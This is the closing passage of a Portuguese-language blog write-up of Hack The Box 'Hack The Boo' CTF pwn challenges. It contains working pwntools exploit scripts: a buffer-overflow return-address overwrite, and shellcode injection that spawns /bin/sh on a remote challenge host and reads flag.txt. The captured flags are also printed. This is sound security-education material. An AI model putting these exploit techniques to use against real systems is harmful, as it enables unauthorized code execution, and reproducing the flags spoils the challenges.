</span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s1">&#39;surname: &#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="o">*</span><span class="mi">72</span> <span class="o">+</span> <span class="n">pwn</span><span class="o">.</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x004008cf</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">recvall</span><span class="p">())</span>
</span></span></code></pre></div><p>Ao executar esse script, obtemos a flag <strong>HTB{d0nt_45k_f0r_gr4p35_4t_4_l3m0n4d3_5t4nd}</strong>.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/20.png" alt="flag"  />
</p>
<h2 id="magic-trick">Magic Trick</h2>
<p>Este último desafio de pwn também envolve a exploração de um buffer overflow. O binário fornecido possui a proteção NX desativada, mas o PIE (Position Independent Executable) ativado, o que significa que pode ser executado código na pilha, mas o endereço base vai mudar a cada execução do programa. O buffer da variável tem 64 bytes, mas, desta vez, estão sendo lidos 78 bytes.</p>
<p>Ao iniciar o programa, ele mostra o endereço para o qual precisamos retornar para executar o código. Esse endereço é lido e salvo em uma variável chamada &ldquo;addr&rdquo;. O código que será executado na memória é um shellcode que cria um shell &ldquo;sh&rdquo;, permitindo a execução de comandos.</p>
<p>Para criar o shellcode, foi utilizada a função do próprio pwntools, e o payload contém o shellcode, alguns NOPs (bytes 0x90, indicando à CPU para não fazer nada), e o endereço de retorno da pilha.</p>
<p>Após a execução do shellcode, uma shell é criada, e, em seguida, o comando &lsquo;cat flag.txt&rsquo; é enviado para obter a flag.</p>
<p>Aqui está o script em Python para realizar o que foi explicado acima:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">pwn</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">ip</span> <span class="o">=</span> <span class="s1">&#39;94.237.59.206&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">42267</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="n">pwn</span><span class="o">.</span><span class="n">remote</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span><span class="n">port</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;is &#39;&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">addr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;&#39;&#34;</span><span class="p">)[:</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s1">&#39;&gt;&gt; &#39;</span><span class="p">,</span> <span class="s1">&#39;y&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">pwn</span><span class="o">.</span><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">shellcode</span> <span class="o">=</span> <span class="n">pwn</span><span class="o">.</span><span class="n">asm</span><span class="p">(</span><span class="n">pwn</span><span class="o">.</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">execve</span><span class="p">(</span><span class="s1">&#39;/bin/sh&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="n">shellcode</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x90</span><span class="s1">&#39;</span> <span class="o">*</span> <span class="mi">35</span> <span class="o">+</span> <span class="n">pwn</span><span class="o">.</span><span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s1">&#39;&gt;&gt; &#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s1">&#39;cat flag.txt&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">recv</span><span class="p">())</span>
</span></span></code></pre></div><p>Ao executar esse script, obtivemos a flag HTB{4br4_k4d4br4_sh3llc0d3}.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/21.png" alt="flag"  />
</p>
<p>Com isso termino esse write-up. Foi um CTF bem divertido em que pude rever várias coisas que não estudava já fazia um tempo, por exemplo esses buffers overflow. Agradeço a toda equipe do Hack the Box por esse CTF e a você que leu até aqui.</p>

  </div>

  <footer class="post-footer">
    <ul class="post-tags">
      tags:
      <li><a href="https://tomiodarim.io/tags/write-up/">write-up</a></li>
      <li><a href="https://tomiodarim.io/tags/hackthebox/">hackthebox</a></li>
      <li><a href="https://tomiodarim.io/tags/ctf/">ctf</a></li>
      <li><a href="https://tomiodarim.io/tags/hacktheboo/">hacktheboo</a></li>
    </ul>

  </footer>
</article>
    </main>
    
<footer class="footer">
    <span>Lucas Tomio Darim · &copy; 2024</span>
</footer>
<a href="#top" aria-label="go to top" title="Go to Top (Alt + G)" class="top-link" id="top-link" accesskey="g">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentColor">
        <path d="M12 6H0l6-6z" />
    </svg>
</a>

<script>
    let menu = document.getElementById('menu')
    if (menu) {
        menu.scrollLeft = localStorage.getItem("menu-scroll-position");
        menu.onscroll = function () {
            localStorage.setItem("menu-scroll-position", menu.scrollLeft);
        }
    }

    document.querySelectorAll('a[href^="#"]').forEach(anchor => {
        anchor.addEventListener("click", function (e) {
            e.preventDefault();
            var id = this.getAttribute("href").substr(1);
            if (!window.matchMedia('(prefers-reduced-motion: reduce)').matches) {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView({
                    behavior: "smooth"
                });
            } else {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView();
            }
            if (id === "top") {
                history.replaceState(null, null, " ");
            } else {
                history.pushState(null, null, `#${id}`);
            }
        });
    });

</script>
<script>
    var mybutton = document.getElementById("top-link");
    window.onscroll = function () {
        if (document.body.scrollTop > 800 || document.documentElement.scrollTop > 800) {
            mybutton.style.visibility = "visible";
            mybutton.style.opacity = "1";
        } else {
            mybutton.style.visibility = "hidden";
            mybutton.style.opacity = "0";
        }
    };

</script>
<script>
    document.getElementById("theme-toggle").addEventListener("click", () => {
        if (document.body.className.includes("dark")) {
            document.body.classList.remove('dark');
            localStorage.setItem("pref-theme", 'light');
        } else {
            document.body.classList.add('dark');
            localStorage.setItem("pref-theme", 'dark');
        }
    })

</script>
<script>
    document.querySelectorAll('pre > code').forEach((codeblock) => {
        const container = codeblock.parentNode.parentNode;

        const copybutton = document.createElement('button');
        copybutton.classList.add('copy-code');
        copybutton.innerHTML = 'copy';

        function copyingDone() {
            copybutton.innerHTML = 'copied!';
            setTimeout(() => {
                copybutton.innerHTML = 'copy';
            }, 2000);
        }

        copybutton.addEventListener('click', (cb) => {
            if ('clipboard' in navigator) {
                navigator.clipboard.writeText(codeblock.textContent);
                copyingDone();
                return;
            }

            const range = document.createRange();
            range.selectNodeContents(codeblock);
            const selection = window.getSelection();
            selection.removeAllRanges();
            selection.addRange(range);
            try {
                document.execCommand('copy');
                copyingDone();
            } catch (e) { };
            selection.removeRange(range);
        });

        if (container.classList.contains("highlight")) {
            container.appendChild(copybutton);
        } else if (container.parentNode.firstChild == container) {
            
        } else if (codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName == "TABLE") {
            
            codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(copybutton);
        } else {
            
            codeblock.parentNode.appendChild(copybutton);
        }
    });
</script>
</body>

</html>
